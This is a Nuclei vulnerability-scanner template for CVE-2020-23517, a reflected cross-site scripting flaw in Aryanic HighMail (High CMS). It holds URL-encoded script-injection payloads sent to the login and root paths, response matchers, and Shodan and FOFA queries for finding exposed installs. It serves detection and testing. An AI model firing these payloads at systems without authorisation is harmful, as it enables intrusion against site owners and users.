nuclei-templates/http/cves/2020/CVE-2020-23517.yaml

49 lines
1.4 KiB
YAML
Raw Normal View History

2021-03-29 15:52:28 +00:00
id: CVE-2020-23517
info:
2022-07-03 17:22:29 +00:00
name: Aryanic HighMail (High CMS) - Cross-Site Scripting
2021-03-29 15:52:28 +00:00
author: geeknik
severity: medium
description: A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.
reference:
- https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html
2022-07-03 17:22:29 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-23517
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-23517
cwe-id: CWE-79
cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:*
epss-score: 0.00118
2022-07-02 12:59:01 +00:00
metadata:
max-request: 2
2023-06-04 08:13:42 +00:00
verified: true
2022-07-02 12:59:01 +00:00
shodan-query: title:"HighMail"
2022-07-02 19:26:38 +00:00
fofa-query: title="HighMail"
2022-07-03 17:22:29 +00:00
tags: cve,cve2020,xss,cms,highmail,aryanic
2021-03-29 15:52:28 +00:00
http:
2021-03-29 15:52:28 +00:00
- method: GET
path:
2022-07-02 12:59:01 +00:00
- "{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
2022-07-02 19:26:38 +00:00
- "{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
2021-03-29 15:52:28 +00:00
2022-07-02 19:26:38 +00:00
stop-at-first-match: true
2021-03-29 15:52:28 +00:00
matchers-condition: and
matchers:
2022-07-02 12:59:01 +00:00
2021-03-29 15:52:28 +00:00
- type: word
words:
2022-07-03 17:22:29 +00:00
- 'value=""><script>alert(document.domain)</script>'
2022-07-02 12:59:01 +00:00
2021-03-29 15:52:28 +00:00
- type: word
words:
2022-07-03 17:22:29 +00:00
- text/html
part: header
2022-07-02 12:59:01 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/03/14